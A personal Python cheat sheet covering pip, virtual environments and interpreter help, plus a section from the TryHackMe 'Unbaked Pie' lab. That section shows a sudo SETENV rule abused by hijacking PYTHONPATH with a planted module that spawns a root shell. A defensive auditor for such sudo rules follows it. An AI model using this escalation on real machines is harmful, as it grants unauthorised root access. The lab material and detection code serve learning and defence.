Python: Notes

>>> Python Standard Library

python -m venv name_env : Create virtual environment 'name_env'
python -m pip install --upgrade pip : Upgrade pip (a package manager for Python)

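python -m http.server 8080 -d /var/www/test : run an ad hoc web server on port 8080 serving /var/www/test (binds to all interfaces by default; add --bind 127.0.0.1 to keep it on localhost only)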

pip is a package manager for Python. It has been installed by default since Python 3.4.

pip install package_name : Install package_name
pip uninstall package_name : Uninstall package_name
pip install -r requirements.txt : install packages listed in requirements.txt file
pip list : list all installed packages

78 / 10 # 7.8 : division
78 // 10 # 7 : integer division
78 % 10 # 8 : modulo

Generate GUID

PS C:\Users\Tuyen> python -c "import uuid ; print(uuid.uuid4())"
01fcc0fc-a620-4f13-9174-c26e3e292780
PS C:\Users\Tuyen>

Get Help

PS C:\Users\Tuyen> python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> help
Type help() for interactive help, or help(object) for help about object.
>>> help()

Welcome to Python 3.6's help utility!

If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/3.6/tutorial/.

Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules.  To quit this help utility and
return to the interpreter, just type "quit".

To get a list of available modules, keywords, symbols, or topics, type
"modules", "keywords", "symbols", or "topics".  Each module also comes
with a one-line summary of what it does; to list the modules whose name
or summary contain a given string such as "spam", type "modules spam".

help>

Install python-jwt module for python2 on Kali Linux WSL

pip install -t /usr/local/lib/python2.7/dist-packages/ python-jwt

Exploit python

oliver@unbaked:~$ sudo -l
Matching Defaults entries for oliver on unbaked:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~$ cat /opt/dockerScript.py
import docker

# oliver, make sure to restart docker if it crashes or anything happened.
# i havent setup swap memory for it
# it is still in development, please dont let it live yet!!!
client = docker.from_env()
client.containers.run("python-django:latest", "sleep infinity", detach=True)
oliver@unbaked:~$ touch /tmp/docker.py
oliver@unbaked:~$ nano /tmp/docker.py
oliver@unbaked:~$ chmod +x /tmp/docker.py
oliver@unbaked:~$ cat /tmp/docker.py
import os
os.system("/bin/bash")
oliver@unbaked:~$
oliver@unbaked:~$ sudo PYTHONPATH=/tmp /usr/bin/python /opt/dockerScript.py
oliver@unbaked:~# id
uid=0(root) gid=0(root) groups=0(root)
oliver@unbaked:~# cat /root/root.txt
CONGRATS ON PWNING THIS BOX!
Created by ch4rm & H0j3n
ps: dont be mad us, we hope you learn something new

flag: THM{REDACTED}
oliver@unbaked:~#
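
A defender-side check for the misconfiguration exploited above, as an added example that is not part of the original post: it parses `sudo -l` output and flags rules that run a Python interpreter while PYTHONPATH can still reach it. The function names, the severity labels and the two extra sample entries are assumptions made for the illustration.

```python
import itertools
import re
import shlex

# Constructed input: first entry is the rule shown above, the other two are hypothetical.
SAMPLE_SUDO_L = """\
User oliver may run the following commands on unbaked:
    (root) SETENV: NOPASSWD: /usr/bin/python /opt/dockerScript.py
    (root) NOPASSWD: /usr/bin/python3 -I /opt/backup.py
    (root) NOPASSWD: /usr/bin/systemctl restart docker
"""

ENTRY = re.compile(r"^\s*\([^)]*\)\s*(.+)$")      # "(runas) rest"
TAG = re.compile(r"([A-Z_]+):\s*")                # SETENV:, NOPASSWD:, ...
PYTHON = re.compile(r"(^|/)python[\d.]*$")        # python, python2.7, python3
NOARG_OPTS = re.compile(r"-[bBdEiIOqsSuvx]+")     # cluster of argument-less options


def parse_entry(line):
    """Split '(runas) TAG: TAG: command args' into (tags, argv), else None."""
    m = ENTRY.match(line)
    if not m:
        return None
    tags, rest = [], m.group(1)
    while (t := TAG.match(rest)):
        tags.append(t.group(1))
        rest = rest[t.end():]
    return tags, shlex.split(rest)


def ignores_env(argv):
    """True if -E or -I precedes the script, so PYTHONPATH is not read."""
    opts = itertools.takewhile(lambda a: a.startswith("-"), argv[1:])
    return any(NOARG_OPTS.fullmatch(o) and set(o) & {"E", "I"} for o in opts)


def audit(sudo_l_output):
    """Return (severity, command) for sudo rules where Python honours PYTHON*.

    'high': SETENV lets the caller supply PYTHONPATH, as in the session above.
    'review': no SETENV, so exposure depends on env_reset/env_keep in Defaults.
    """
    findings = []
    for line in sudo_l_output.splitlines():
        parsed = parse_entry(line)
        if not parsed or not parsed[1] or not PYTHON.search(parsed[1][0]):
            continue
        tags, argv = parsed
        if not ignores_env(argv):
            severity = "high" if "SETENV" in tags else "review"
            findings.append((severity, " ".join(argv)))
    return findings
```

Removing SETENV from the rule, or having the rule invoke the interpreter with -E (or -I on Python 3.4+), closes the import path used in the session above.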

Practice

>>> THM | Unbaked Pie

>>> The Zen of Python by Tim Peters
